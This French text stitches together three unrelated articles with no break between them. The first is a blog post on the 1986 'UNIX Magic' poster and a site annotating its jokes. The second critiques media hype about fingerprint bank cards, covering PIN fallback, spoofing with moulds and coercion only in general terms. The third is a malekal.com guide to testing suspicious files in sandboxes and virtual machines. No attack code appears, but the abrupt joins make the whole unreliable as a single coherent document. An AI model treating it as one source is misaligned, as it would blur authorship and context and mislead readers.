Si vous avez bossé sous Unix dans les années 80, vous avez peut-être déjà croisé ce poster. Un sorcier barbu en robe noire, un chaudron qui déborde, des étagères couvertes de conteneurs étiquetés tar, awk, troff... C'est l'œuvre de Gary Overacre, publiée par UniTech Software dans les années 80 (apparemment 1986), et ce n'est qu'aujourd'hui qu'un dev nommé drio s'est dit que ce serait cool de cartographier chaque référence cachée sur unixmagic.net .

De ce que j'ai pu lire, le poster aurait été distribué en marge des conférences USENIX comme goodie et il n'y a visiblement jamais eu de réimpression. En 2021, le blogueur Jan-Piet Mens indiquait, après avoir contacté l'épouse de Gary Overacre et selon ses dires, il resterait environ 65 originaux du UNIX Magic chez les Overacre.

Overacre a aussi signé deux autres posters dans la foulée, encore plus rares (les titres listés varient selon les sources de revente : "Unix Feuds" ou "Computer Feuds", et "The View").

Computer Feuds (ou Unix Feuds selon les sources) - Gary Overacre.

Après si vous voulez l'un de ces visuels chez vous, deux options s'offrent à vous : Chasser un exemplaire sur eBay (et payer le prix d'un collector), ou imprimer la version 32 Mo dispo sur archive.org.

The View - Gary Overacre.

Maintenant, ce qui rend le poster culte, c'est pas juste sa rareté. C'est surtout la densité des blagues techniques planquées dedans. Selon les interprétations communautaires recensées sur unixmagic.net, le sorcier représente l'admin Unix maître du système, le chat noir perché à proximité serait cat, la fourche qu'il tient en main serait fork(), les tuyaux qui serpentent partout seraient les pipes (|), le crâne en bas du chaudron pointerait vers /dev/null là où les données vont mourir, et la botte qui traîne par terre serait un jeu visuel autour de boot (ou peut-être un sock/socket selon une autre annotation).

UNIX Magic - Gary Overacre, 1986. Source : archive.org / unixmagic.net

Sur les étagères, vous avez également des conteneurs avec les noms des outils Unix classiques : tar, awk, diff, uucp, troff, make. Et juste à côté, un détail que beaucoup ratent : un conteneur étiqueté C intact, et un autre étiqueté B... fissuré. Interprétation probable au fait que le langage C a remplacé son prédécesseur B (créé par Ken Thompson en 1969-1970 avant d'être supplanté par le C de Dennis Ritchie ). Il y a plein de petites subtilités comme ça.

Y'a aussi des initiales planquées un peu partout : dmr (Dennis M. Ritchie), kt (Ken Thompson), bwk (Brian Kernighan), soit trois grandes figures de la culture Unix dans un seul dessin. La robe du sorcier est également constellée de symboles shell, les caractères de redirection, le pourcentage du prompt csh, le dollar du prompt sh, l'astérisque du glob, le point d'exclamation de l'history expansion, les crochets... bref des symboles courants des shells Unix qu'on tape sans y penser en ligne de commande.

Même le titre du poster est présenté en grosses lettres bloc, comme la sortie de la commande banner. Et un peu plus loin, vous avez wall (l'utilitaire qui envoie un message à tous les utilisateurs connectés) représenté littéralement par un mur.

Voilà, le poster Unix Magic, c'est ce niveau de blagues visuelles partout.

Le projet de drio consiste donc à poser des marqueurs interactifs sur chaque détail du poster. À la date d'aujourd'hui, le site unixmagic.net affichait 41 références identifiées et documentées. C'est dans l'esprit, comparable à l'archéologie du Glider , ce symbole hacker dont je vous ai déjà parlé.

Et vous avez peut-être vu mais sur le poster, y'a aussi un sac d'origan posé dans un coin. C'est du folklore BSD non vérifié, mais d'après les spécialistes, ça ferait écho à une histoire de communauté où un acteur du milieu aurait été interpellé à la frontière canado-américaine avec un sac suspect dans ses bagages. Les douaniers étaient persuadés que c'était de la drogue alors que c'était de l'origan !

Et c'est ça, la vraie valeur du projet drio car sans ce travail de documentation, dans 20 ans, la référence au sac d'origan ou d'autres risquent de devenir impossibles à comprendre car les références se perdent avec les générations.

Après si en bon barbu survivant des années 80, vous reconnaissez un détail que personne n'a encore décodé, c'est le moment d'apporter votre pierre à l'édifice.

Et si vous voulez en faire un trophée mural, comme j'vous disais, archive.org a la version 32 Mo.

Source

Depuis quelques jours, plusieurs médias français ressortent cette merveilleuse histoire de la carte bancaire à empreinte digitale comme s'il s'agissait d'une révolution imminente ! Par exemple l'Indépendant titre carrément "le code à quatre chiffres c'est bientôt fini". Toudoum !!

Sauf que la techno, conçue par Thales et IDEMIA , est commercialisée en Europe depuis 2021 quand même. Et plus drôle encore, c'est que BNP Paribas a fermé la commercialisation de sa première version le 8 décembre 2025, soit bien avant que la presse en fasse un sujet d'actualité "frais".

La carte F.CODE d'IDEMIA, l'un des deux principaux fabricants de cartes biométriques en Europe avec Thales (crédit : IDEMIA).

Donc bon, on va remettre les pendules à l'heure ensemble, parce que le sujet mérite mieux qu'un communiqué de presse recopié à la chaîne par dix rédactions. Je vous propose donc de remettre un peu tout ça à plat parce que je lis quand même pas mal de conneries.

Tout d'abord, il faut savoir que le principe technique derrière ces CB est solide, faut le reconnaître. Vous posez le pouce sur un petit capteur de quelques millimètres intégré à la carte, le module Secure Element (l'équivalent du coffre-fort embarqué) compare l'empreinte au gabarit stocké dans la puce, et si ça matche, le paiement passe en moins d'une seconde !

Le mot-clé c'est d'ailleurs "match-on-card". Cela veut dire que la comparaison se fait localement, et donc que l'empreinte ne sort jamais de la carte, ni vers le commerçant, ni vers la banque, ni vers un serveur quelque part. C'est donc exactement le même délire que Touch ID ou Face ID chez Apple, et c'est ce qui distingue ce système d'une base biométrique centralisée façon ANT, dont on a vu cette année à quel point ça pouvait mal finir (looool).

Côté sécurité, y'a beaucoup de vrais points positifs. Le code PIN à quatre chiffres, c'est dix mille combinaisons. Avec un peu de skimming sur un terminal compromis et une caméra cachée au-dessus du clavier, vous pouvez tout récupérer encore plus facilement. Sans parler des PIN type 1234, 0000 ou date de naissance qui représentent une part énorme des codes en circulation selon les analyses de DataGenetics (1234 représente à lui seul environ 10,7% des PIN observés sur 3,4 millions de codes analysés).

La biométrie vient donc tuer ce vecteur d'attaque d'un coup. Ainsi, si quelqu'un vole votre carte, il ne peut rien en faire, en théorie, sans votre doigt. Faudra avoir un bon sécateur ^^. Et niveau conformité, ça rentre pile-poil dans le cadre PSD2 et l'authentification forte du client puisque la biométrie remplace le facteur "savoir" (le PIN) par un facteur "inhérence" (votre corps), ce qui valide les deux facteurs requis avec la possession de la carte. Une fois encore c'est comme avec l'iPhone et FaceID / TouchID quand on se connecte quelque part.

Sauf que voilà, c'est là que les médias arrêtent de creuser. Et y'a beaucoup de choses à creuser, croyez-moi ! Perso je trouve ça assez "gênant" (comme disent les zados... "Annnnh la génance !!") qu'on nous présente un sujet sécurité aussi important comme si on nous vendait des yaourts.

Parce que d'abord, le code PIN ne disparaît pas, sauf si vous avez la chance d'avoir une banque qui vous laisse le désactiver explicitement (et bonne chance pour trouver l'option dans les CGV). Hé oui, quasi toutes les implémentations que j'ai pu voir passer, gardent un bon gros fallback PIN pour les cas où le capteur foire (doigt mouillé, sale (sacré lulu), blessure, capteur défaillant) ou pour les retraits au DAB.

Or, vous le savez parce que vous avez Bac+18 en bon sens, la sécurité globale d'un système est celle de son maillon le plus faible. Donc si le code PIN reste en backup, vous n'avez pas supprimé le maillon faible mais vous l'avez juste rendu optionnel. Et donc un voleur qui sait ça, sera capable de forcer le fallback en simulant un échec biométrique et utiliser le code PIN pour peu qu'il le connaisse. Comme avant quoi...

Donc cette promesse "fin du code à 4 chiffres" est donc un bon gros raccourci marketing, et pas du tout une réalité technique.

Ensuite, autre souci, c'est que la biométrie n'est pas révocable. Donc si demain un labo ou un expert sécu arrive à extraire un gabarit d'empreinte d'un Secure Element compromis (ça s'est déjà vu sur des puces certifiées EAL5+ par attaques side-channel), vous ne pourrez pas changer votre doigt parce que j'sais pas si vous avez remarqué mais il est bien solidement attaché au sac de viande que vous appelez "Mon summer body" ^^.

Le risque est heureusement limité dans ce cas-ci parce que le gabarit reste sur la carte, mais structurellement, la donnée biométrique EST un mot de passe que vous ne pouvez jamais changer. C'est une contrepartie importante que personne ne mentionne dans les articles grand public.

Sur les attaques physiques par exemple, le Chaos Computer Club qu'on connaît tous, a démontré dès 2013 le bypass de Touch ID avec un moulage en latex fabriqué à partir d'une empreinte laissée sur un verre. Les capteurs intégrés dans une carte bancaire sont plus petits, moins denses en pixels, et n'ont pas la même puissance de calcul pour faire tourner des modèles anti-spoof avancés que ce qui est embarqué dans un iPhone.

Ils sont donc plausiblement PLUS contournables, donc j'imagine qu'un moulage en silicone ou en résine pourra facilement en venir à bout. À ma connaissance, y'a aucun chiffre public sérieux qui n'a été publié par les fabricants sur le taux de succès de ces attaques sur leurs cartes. Comme c'est pratique ;)

Le sujet de la mise sous pression par des affreux bandits, mérite aussi une mention. Parce qu'avec un code PIN, si on vous menace devant un DAB, vous pouvez théoriquement saisir un faux code (certaines cartes ont même une notion de " code sous contrainte " qui bloque la carte directement). Alors qu'avec un doigt, on vous chope la main et force et voilà...

La jurisprudence américaine est d'ailleurs intéressante là-dessus puisqu'un juge peut vous obliger à poser le doigt sur un TouchID, mais pas à donner votre code PIN par respect du 5e amendement. En France le débat est un peu différent mais analogue. C'est un petit détail légal mais personne ne l'aborde non plus pour tout ce qui est sécurité biométrique en général.

L'enrôlement à domicile via smartphone, vendu comme "sécurisé" mais dont le protocole détaillé reste opaque (crédit : IDEMIA).

Autre angle mort, l'enrôlement. En effet, aucun des articles que j'ai lus ne décrit exactement comment l'empreinte arrive dans la puce la première fois. Est-ce que ça se fait en agence, avec un lecteur dédié ? Via une app smartphone qui pousse le gabarit par NFC ?

On en sait rien, mais si c'est la seconde option, le pipeline app + carte est une surface d'attaque qui mérite un audit indépendant, et la promesse de "l'empreinte ne quitte jamais la carte" devient à géométrie variable. Côté Thales et IDEMIA, le marketing parle d'enrôlement à domicile sécurisé, mais les détails du protocole sont peu documentés, tout du moins ce que j'ai pu trouver en libre accès.

Et pour finir sur le côté pratique, la biométrie est une option payante. Bah ouais, 24 balles par an chez BNP et Crédit Agricole, sur des cartes Visa Premier ou Mastercard Gold qui coûtent déjà entre 130 et 180€ annuels, pourquoi se faire chier ? Société Générale a annoncé vouloir descendre en gamme là-dessus, mais pour l'instant, la sécurité forte est réservée à ceux qui peuvent payer. Sécurité à deux vitesses, donc, comme d'hab et moi je trouve que c'est un peu paradoxal pour un truc présenté comme la nouvelle norme.

Bref, mon verdict sur tout ça c'est que le design technique est bon, le match-on-card protège VRAIMENT des fuites massives, et ça c'est un excellent progrès face au PIN à 4 chiffres pour tout ce qui est usage courant. Mais le narratif "fin du code secret" reste faux puisque le PIN perdure en fallback, et surtout, la biométrie pose des problèmes structurels bien connus (non-révocable, vulnérable aux moulages, coercition, enrôlement opaque).

Donc voilà, si demain votre banque vous propose le passage au biométrique, demandez-lui comment se passe l'enrôlement, si le fallback PIN est désactivable, et combien ça coûte. Et peut-être que là, ça pourra être intéressant.

Exécuter un fichier téléchargé sans vérification est l’une des causes les plus fréquentes d’infection sur Windows. Un programme apparemment légitime peut contenir un malware capable de compromettre votre PC en quelques secondes.

Pour limiter les risques, il ne suffit pas d’analyser un fichier : il est parfois nécessaire de le tester dans un environnement sécurisé.

Plusieurs solutions existent pour cela :

• Windows Sandbox (bac à sable intégré)
• machine virtuelle (VirtualBox)
• sandbox en ligne

Ces méthodes permettent d’exécuter un fichier sans impacter votre système principal.

Dans ce guide, vous allez découvrir comment tester un fichier en toute sécurité sur Windows 11/10, quelles méthodes utiliser et laquelle choisir selon votre besoin.

Pourquoi tester un fichier avant de l’exécuter

Avant d’ouvrir ou d’installer un fichier téléchargé, il est fortement recommandé de le tester. En effet, un simple programme peut contenir un malware capable d’infecter votre PC en quelques secondes.

Même un fichier qui semble légitime peut être dangereux :

• logiciel téléchargé hors site officiel
• archive contenant un exécutable
• crack ou keygen
• pièce jointe reçue par email

Une seule exécution suffit parfois à compromettre votre système.

Un risque souvent sous-estimé

De nombreux malwares sont conçus pour :

• s’installer discrètement
• voler des données personnelles
• modifier le système
• ouvrir une porte d’accès à distance

Et cela peut se produire sans signe visible immédiat.

Tester plutôt qu’analyser

L’analyse (antivirus, VirusTotal) donne une indication, mais elle ne suffit pas toujours.

Tester un fichier permet de :

• observer son comportement réel
• détecter des actions suspectes
• vérifier son impact sur le système

C’est une étape supplémentaire pour réduire les risques.

Une protection essentielle

Tester un fichier avant exécution permet :

• d’éviter une infection
• de protéger vos données
• de préserver la stabilité de votre PC

C’est une pratique simple qui peut éviter des problèmes importants.

Analyser vs tester un fichier : quelles différences

Avant d’exécuter un fichier, deux approches sont possibles : l’analyser ou le tester. Ces méthodes sont complémentaires mais répondent à des objectifs différents.

Analyser un fichier

L’analyse consiste à vérifier un fichier sans l’exécuter.

Elle repose sur des outils comme :

• antivirus
• VirusTotal (multi-antivirus)
• vérification de la signature numérique

L’analyse permet de :

• détecter des malwares connus
• identifier un fichier suspect
• obtenir un premier niveau de sécurité

C’est une étape rapide, mais limitée.

Le guide complet :

VirusTotal : analyser et scanner un fichier avec plusieurs antivirus (GUIDE COMPLET)

Tester un fichier

Le test consiste à exécuter le fichier dans un environnement isolé, comme une sandbox ou une machine virtuelle.

Cela permet de :

• observer le comportement réel du programme
• détecter des actions suspectes (réseau, fichiers, processus)
• voir l’impact sur le système

Le test va plus loin que l’analyse.

Comparatif rapide

Pourquoi utiliser les deux

Aucune méthode n’est suffisante seule :

• un fichier peut passer l’analyse mais être malveillant
• un test permet de confirmer le comportement

La meilleure approche est de combiner analyse + test.

Tester un fichier avec Windows Sandbox (méthode simple et sécurisée)

Windows Sandbox est la méthode la plus simple pour tester un fichier suspect sans risque sur Windows 11/10.

Il permet d’exécuter un programme dans un environnement isolé :

• sans impact sur votre système principal
• sans installation permanente
• avec suppression automatique après fermeture

C’est idéal pour vérifier le comportement d’un fichier inconnu.

Comment l’utiliser rapidement

Le principe est simple :

• lancez Windows Sandbox
• copiez le fichier à tester
• exécutez-le dans la sandbox
• observez son comportement

Pour le guide complet (activation + utilisation) :

Windows Sandbox : tester un fichier en toute sécurité sur Windows 11/10

Tester un fichier avec une machine virtuelle (VirtualBox)

Une autre méthode consiste à utiliser une machine virtuelle (VM), comme VirtualBox, pour tester un fichier dans un environnement totalement isolé.

Contrairement à Windows Sandbox, la machine virtuelle est :

• persistante (elle garde les modifications)
• plus complète
• adaptée à des tests avancés

Principe de fonctionnement

L’idée est simple :

• installer un Windows dans VirtualBox
• exécuter le fichier suspect dans cette VM
• observer son comportement

Le système principal n’est pas impacté.

VirtualBox permet d’exécuter plusieurs systèmes en parallèle, chacun isolé dans son propre environnement.

Utiliser les snapshots (très important)

Avant de tester un fichier, il est recommandé de créer un snapshot.

Un snapshot est un point de restauration qui permet de revenir à un état précédent de la machine virtuelle

Le workflow idéal :

• installez Windows 11 dans VirtualBox
• créez un snapshot propre
• testez le fichier suspect
• revenez au snapshot après test

Cela permet de nettoyer la VM instantanément.

Quand utiliser VirtualBox

Cette solution est idéale si :

• vous testez régulièrement des fichiers
• vous avez besoin d’un environnement complet
• Windows Sandbox n’est pas disponible

Tutoriel complet :

Comment installer Windows 11 sur VirtualBox

Tester un fichier avec des outils en ligne (VirusTotal, sandbox)

Il est également possible de tester un fichier sans rien installer sur votre PC, en utilisant des services en ligne. Ces plateformes analysent le fichier à distance et permettent d’observer son comportement dans une sandbox.

C’est une solution simple et rapide, idéale pour une première vérification.

Analyse avec VirusTotal

VirusTotal permet d’analyser un fichier avec plusieurs antivirus et propose aussi une analyse comportementale.

Vous pouvez :

• uploader un fichier
• consulter le score de détection
• accéder à l’onglet Behavior pour voir son activité

Guides complets :

• VirusTotal : analyser un fichier avec plusieurs antivirus
• VirusTotal : analyser le comportement d’un malware

Sandbox en ligne

Certains services permettent d’exécuter un fichier dans une sandbox directement depuis le navigateur :

• Any.run
• Hybrid Analysis

Ces outils permettent de :

• voir les actions du programme en temps réel
• analyser les connexions réseau
• détecter des comportements suspects

Ils vont plus loin qu’un simple scan antivirus.

Limites des outils en ligne

Ces solutions présentent toutefois des limites :

• les fichiers envoyés peuvent devenir publics
• certaines analyses sont limitées
• les malwares peuvent détecter l’environnement de test et ne pas exécuter la partie malveillante

Il faut éviter d’y envoyer des fichiers sensibles.

Quelle méthode choisir pour tester un fichier

Voici un tableau récapitulatif des principales méthodes pour tester un fichier en toute sécurité sur Windows 11/10.

Tableau comparatif des méthodes

Comment choisir

Voici le bon réflexe :

• doute léger → VirusTotal
• fichier suspect → Windows Sandbox
• analyse approfondie → VirtualBox
• test rapide sans installation → sandbox en ligne

Limites et précautions pour tester un fichier

Tester un fichier dans un environnement sécurisé réduit fortement les risques, mais ne garantit pas une protection totale. Il est donc important de connaître les limites de ces méthodes et d’adopter les bons réflexes.

Aucune méthode n’est infaillible

Même avec une sandbox ou une machine virtuelle :

• certains malwares peuvent détecter l’environnement virtualisé
• ils peuvent modifier leur comportement pour éviter la détection
• certains programmes malveillants n’agissent qu’après un délai

Un fichier peut donc sembler inoffensif… alors qu’il ne l’est pas réellement.

Risques liés aux outils en ligne

Les services en ligne présentent des contraintes :

• les fichiers envoyés peuvent devenir publics
• certaines analyses sont limitées
• les résultats peuvent être incomplets

Il est déconseillé d’y envoyer des fichiers sensibles ou confidentiels.

Précautions à prendre

Pour tester un fichier en toute sécurité :

• n’utilisez pas de données personnelles dans la sandbox ou la VM
• ne connectez pas de comptes importants
• évitez de copier des fichiers sensibles
• surveillez le comportement du programme

Le test doit rester un environnement d’observation.

Ne pas se reposer uniquement sur une méthode

Tester un fichier est une étape importante, mais doit être complétée :

• par une analyse antivirus
• par VirusTotal
• par la vérification de la signature

Multiplier les méthodes permet d’obtenir un diagnostic plus fiable.

Ressources utiles et articles liés

Comment vérifier si ordinateur a été hacké ou piraté ?

• Comment analyser un fichier téléchargé et vérifier s’il est dangereux (virus, malware)
• Comment vérifier si un processus est légitime ou malveillant sous Windows 11/10
• Comment vérifier un lien internet : malveillant ou sain ?
• Comment savoir si quelqu’un s’est connecté à votre ordinateur
• Comment savoir si quelqu’un contrôle mon PC a distance
• Comment savoir ce qui a été fait sur un ordinateur et vérifier l’activité récente de son PC
• Comment vérifier si le PC a été piraté ou hacké
• VirusTotal : scanner/analyser un fichier avec plusieurs antivirus
• Shouldiclick : Vérifier si un site est malveillant

• Comment protéger son PC des virus et des pirates ?

L’article Comment tester un fichier en toute sécurité sur Windows 11/10 (sandbox, machine virtuelle) est apparu en premier sur malekal.com.